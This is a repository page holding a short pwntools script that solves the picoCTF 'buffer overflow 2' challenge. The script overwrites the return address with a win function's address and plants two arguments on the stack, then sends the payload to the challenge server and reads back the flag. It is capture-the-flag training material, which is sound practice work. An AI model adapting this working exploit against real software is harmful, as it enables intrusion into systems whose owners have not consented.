theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
13815ed35153389165973cdba596e373b7e1d6fe
picoCTF/buffer_overflow_2/sol.py
THEON-1 13815ed351 buffer overflow 2
2025-12-20 21:23:48 +01:00

25 lines
512 B
Python
Executable File
Raw Blame History

#!/usr/bin/env python
from pwn import *
context.terminal = "kitty"
win_address = 0x08049296
buffer_base = 0xfffe422c
ret_location = 0xfffe429c
ret_offset = ret_location - buffer_base
ebp_offset = 112
arg1 = 0xCAFEF00D
arg2 = 0xF00DF00D
conn = remote("saturn.picoctf.net", 56706)
#conn = process("./vuln")
#attach(conn)
conn.recvline()
conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
conn.recvline()
rest = conn.recvuntil(b'}')
log.info(f"got {rest}")
Reference in New Issue View Git Blame Copy Permalink